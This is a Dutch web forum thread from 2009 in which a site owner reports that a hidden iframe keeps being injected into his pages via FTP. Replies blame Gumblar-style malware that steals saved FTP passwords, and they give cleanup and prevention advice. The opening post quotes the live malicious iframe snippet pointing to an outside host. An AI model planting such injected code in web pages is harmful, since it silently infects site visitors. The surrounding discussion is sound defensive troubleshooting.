Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Website geinfecteerd

Pagina: 1
Acties:

  • iznogood
  • Registratie: September 2001
  • Niet online
Ik heb een site bij space1 waar telkens een deel van mijn pagina's de toevoeging
code:
1
<iframe src="http://q1f.ru:8080/index.php" width=182 height=179 style="visibility: hidden"></iframe>
krijgt.

Het lijkt erop dat deze toevoeging via ftp gedaan wordt aangezien andere websites van mij met dezelfde ftp root ook aangepast worden. Space1 claimt dat het probleem zich niet aan hun zijde bevindt.

Ik heb geen idee door welke exploit dit gedaan wordt en op welke wijze. Is dit bij iemand bekend?

[ Voor 6% gewijzigd door iznogood op 28-07-2009 18:49 ]

Just as Good


  • SinergyX
  • Registratie: November 2001
  • Laatst online: 13:03

SinergyX

____(>^^(>0o)>____

joomla? Of fout sql scriptje dat gevoelig was voor injecten?

Nog 1 keertje.. het is SinergyX, niet SynergyX
Im as excited to be here as a 42 gnome warlock who rolled on a green pair of cloth boots but was given a epic staff of uber awsome noob pwning by accident.


  • iznogood
  • Registratie: September 2001
  • Niet online
SinergyX schreef op dinsdag 28 juli 2009 @ 18:43:
joomla? Of fout sql scriptje dat gevoelig was voor injecten?
Joomla gebruik ik niet. Ik denk niet dat het een geinjecteerd script is aangezien vanuit de website waar ik scripts (php/mysql/js) gebruik geen toegang mogelijk is naar mijn andere websites (dit weet ik niet 100% zeker).

Just as Good


  • vincedd
  • Registratie: Oktober 2008
  • Laatst online: 13:16
Beetje off topic: space1 ,ben er weggegaan vanwege dat me site traag was(mag ook wel,zit in Denemarken,prijs was goedkoop).Heb schriftelijk opgezegt,naar een postbusnummer in Utrecht.Nooit een bevestiging van gehad.Is wel netjes afgehandeld,word niets meer van mijn rekening afgeschreven,maar geeft niet echt een goed vertrouwen.Dus voor mij geen space1 meer.

  • Sebazzz
  • Registratie: September 2006
  • Laatst online: 30-11 09:00

Sebazzz

3dp

Mijn space1 site doet het prima, dus ik zou naar de beveiliging van je pc kijken ;) Misschien wilt Space1 de FTP logs van jouw account afstaan, dat kan ook helpen.

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]


  • Saven
  • Registratie: December 2006
  • Laatst online: 13:53

Saven

Administrator

Dit is toch echt helaas meestal een lokaal probleem. Een trojan die al je html en php files infecteert.
Dat is wat mijn ervaring leert dan. Heb het nog nooit meegemaakt dat de server dat voor me deed :P

  • Robert
  • Registratie: Juni 2000
  • Laatst online: 07:38

Robert

You have your answer..

Dit is hoogstwaarschijnlijk een virus á la Gumblar. Onderstaande komt in feite neer op het herinstalleren van je PC.

Via google kun je enkele manieren vinden om dit soort virussen van je PC te verwijderen, echter zal je op die manier nooit zeker zijn dat er niet iets is achtergebleven (gumblar is bijvoorbeeld echt een gemeen kreng).
Er is de laatste tijd een opmars van schadelijke software (malware), die niet alleen op je eigen PC schade aanricht maar ook uit is op wachtwoorden die je gebruikt om je website te onderhouden en deze vervolgens infecteert.

Hoe werkt het?
Gumblar is een voorbeeld van dit soort malware. Je computer kan besmet raken als je een geinfecteerde website bezoekt door een lek in Adobe Reader of Adobe Flash.

Naast het infecteren van je PC, zoek deze software naar opgeslagen wachtwoorden in veelgebruikte FTP programma’s om zichzelf verder te verspreiden.

De gestolen FTP wachtwoorden worden vervolgens gebruikt om (geautomatiseerd) bestanden van je website aan te passen. Zo kan er bijvoorbeeld javascript of iframe code worden toegevoegd waardoor bezoekers van jouw website op hun beurt weer worden besmet.

Hoe voorkom ik dit?

1. Houd software (zeker voor je browser) up-to-date. Een gratis en zeer goed hulpmiddel daarvoor is bijvoorbeeld Secunia Software Inspector. Download in ieder geval de laatste versies van Adobe Reader en Flash.
2. Browse veilig; klik niet zomaar op links (zeker uit e-mails die lijken op spam). En als je echt veilig wilt surfen kun je Firefox in combinatie met NoScript gebruiken.
3. Ook al heb je een virusscanner, is het goed om regelmatig je PC te scannen met een extra malware scanner zoals Malwarebytes.
4. Bewaar je FTP wachtwoord niet in je FTP programma, en gebruik een third-party applicatie voor het beheer van je wachtwoorden.
5. Let op met outsourcing en het verstrekken van wachtwoorden. Ook al vertrouw je de persoon of organisatie waar je je FTP wachtwoorden aan verstrekt, ook zij kunnen geinfecteerd raken (in lage lonen landen worden bovendien meer infecties aangetroffen).

<strong>Wat te doen als ik geinfecteerd ben</strong>
Wijzig direct alle wachtwoord(en) die je hebt opgeslagen op je PC (uiteraard vanaf een schone installatie of andere PC). Vervolgens moet je vaststellen wat voor virus je hebt opgelopen. Gebruik hiervoor bijvoorbeeld de eerdergenoemde Malwarebytes scanner of installeer een recente virusscanner. Volg vervolgens de raadgevingen op die het programma geeft om dit virus te verwijderen. De enige manier om echt zeker te zijn dat je PC weer veilig is, is echter om deze opnieuw te installeren. Hoewel dit veel werk is, voorkomt het dat er toch nog backdoors of rootkits achterblijven waardoor je opnieuw geinfecteerd kan raken of zelfs gerichte aanvallen van hackers krijgt te verduren.
bron http://www.henselhosting.nl/pas-goed-op-je-ftp-wachtwoorden/

[ Voor 21% gewijzigd door Robert op 29-07-2009 03:24 ]

Just 'cause I'm paranoid doesn't mean they're not after me | The only operating system that does what you want: LFS


  • Foamy
  • Registratie: November 2006
  • Laatst online: 24-11 17:20

Foamy

Fulltime prutser

Wat Robert zegt idd. Dit word over het algemeen veroorzaakt door een virus/trojan. Kwestie van pc opschonen, alle wachtwoorden wijzigen en een schone kopie van je site terugplaatsen :)

blub


Verwijderd

dit heb ik net zelf ook mee mogen maken met de website van een van de bedrijven die ik ondersteun. Door een virus op een van de werkstations worden de iframes via ftp erop gezet waardoor het lijkt dat de site verdwenen is.
Hier was het veranderen van het FTP ww genoeg.

Verwijderd

Verwijderd schreef op woensdag 29 juli 2009 @ 16:18:
dit heb ik net zelf ook mee mogen maken met de website van een van de bedrijven die ik ondersteun. Door een virus op een van de werkstations worden de iframes via ftp erop gezet waardoor het lijkt dat de site verdwenen is.
Hier was het veranderen van het FTP ww genoeg.
welke site is dit Mr. Keekos?

Verwijderd

de site kan ik helaas niet vrijgeven omdat deze niet van mij is maar ik deze alleen ondersteun. ;)

  • BtM909
  • Registratie: Juni 2000
  • Niet online

BtM909

Watch out Guys...

Punt is dat 't heel makkelijk uit te sluiten is of 't een lokaal of online probleem is ;)

Ga dan even vanaf een andere computer naar die website :)

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.


  • jep
  • Registratie: November 2000
  • Laatst online: 30-11 17:24

jep

BtM909 schreef op donderdag 30 juli 2009 @ 13:53:
Punt is dat 't heel makkelijk uit te sluiten is of 't een lokaal of online probleem is ;)

Ga dan even vanaf een andere computer naar die website :)
Die iFrame staat echt wel in zijn code, alleen 't is (denk ik) inderdaad 't bovenstaande probleem met een virus dat FTP misbruikt. Ik heb er de afgelopen dagen een aantal klanten over aan de lijn gehad. Bekend probleem dus.
Pagina: 1